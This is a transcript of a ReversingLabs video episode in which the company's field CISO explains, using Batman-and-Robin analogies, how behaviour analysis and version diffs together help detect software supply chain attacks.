In this episode, Matt Rose explains how software supply chain security is better with the wonder duo of behavior and differential analysis.

Keep learning
• More RG: Supply Chain in Art and Life
• Blog: RSAC 23: Supply Chain and AI
• Special: The State of Supply Chain Security

Episode Transcript

MATT ROSE: Hi everyone. Welcome back to another episode of ReversingGlass. I'm Matt Rose, Field CISO at ReversingLabs. Today is an episode, across the top, as usual is Better Together SSCS or Software Supply Chain Security. So there's really two aspects of software supply chain security that I think work very well together to help identify risks in the software that you're creating.

But before we start, let's talk about some historic better together individuals. The one that I wanna start with, and this is one of my favorites from the past Batman, but I'm not talking about the modern Batman, which is all special effects. I'm talking about Burt Ward and Adam West in the show, which was...pretty bad, but one of my favorite things to watch when I was a kid before school. Great, better together, Batman and Robin always. But I always like to do a little weird stuff on this episode too. Do you know, and this is just a little history lesson here, that Adam West is Batman. We just established that, but Adam West is also Mayor West from family guy.

 Bringing things together here. Batman, Adam West, one of the greatest, I think, TV shows of the '60s and '70s. And then one of the modern episodes of Family Guy is Mayor West. We'll just leave that, but if you're not a superhero person, another example that I'd like to say.

Is better together, Forrest Gump, like peas and carrots, better together. We're like peas and carrots. What we're gonna talk today about is better together with software supply chain security, and let me grab my pen. The two things that I think are very important for effective software supply chain security are behaviors of the package that you're creating, deploying, so on and so forth. So you have your behaviors and DIFFS of different releases, version 1.1 to 1.2, so on and so forth. Why are these two things important? Because software supply chain security is about producing software that is doing what it's supposed to do.

A lot of times people architect a product to do certain things, to perform certain functions. These are the behaviors. It connects to APIs, it opens up ports uh, 443 or 80 or whatever it is. Is it doing what it's supposed to be doing? Because really what hacks, whether they're in code or in an application that's deployed, is going outside the bounds of the intended purpose.

So if you think about, you know your package, and I always like to use a nice Christmas package here, or birthday package, whatever you want to call it. Is this package doing what it's supposed to be doing? You have all these things that it's doing in terms of its behaviors, but all of a sudden you realize, hey, I am not anticipating number seven and eight in terms of the behavior.

I don't know if this is something that's intended, something that's accidental or it's malware trying to change some things in the package to allow [00:03:00] itself to execute. So for software supply chain security to be effective, you have to really dig into the behaviors of the package itself. Are these behaviors suspect?

Is it doing the things it's supposed to be doing or is it doing things that it's not anticipated to do? That's the first sign of a potential software supply chain breach is questionable behaviors. What is that piece of software or application doing after analyzing it from a software supply chain security standpoint?

The next thing that is vitally important is DIFFS. DIFFS is short for differential, or looking at the versions, as I said, 1.1 to 1.2. What has changed in this application? This is a small release or this is a large release? How many files are changed? You know how many are deleted? And how many are added to this package?

This is another litmus test for the validity of this package. So you're thinking about, is it doing things that [00:04:00] you're not anticipating it doing, or is it doing things that are outside the bounds of the purpose or is it radically changing the composition of the application? So a lot of different software supply chain attacks, you have added files or files are taken out, or files are manipulated or changed to allow the malware or that software supply chain attack to propagate itself and work correctly.

So when you're thinking about software supply chain security, don't just think about malware is vitally important. Yes. No questions about that. Malware is the DNA of software supply chain attacks. It's getting that malware into the process itself, but malware is very difficult to find. It's not as easy as grepping the package or the results of the set and saying, find malware.DLL on the package.

I say that a lot, but it's not as simple as that. The way that you can actually uncover malware hiding itself in, sometimes in plain sight is through questionable behaviors or unanticipated behaviors and major or minor for that matter, changes that are potentially unapproved or things that somebody has compromised the build system or the code or third parties or open source to allow for that attack to happen.

So think about it. When you think about software supply chain security, think about things working better together, whether it's Batman and Robin, or Jenny and Forrest, Behaviors and DIFFS are better together for software supply chain security. Thanks for watching. Hope you enjoyed the episode. Have a great day everybody.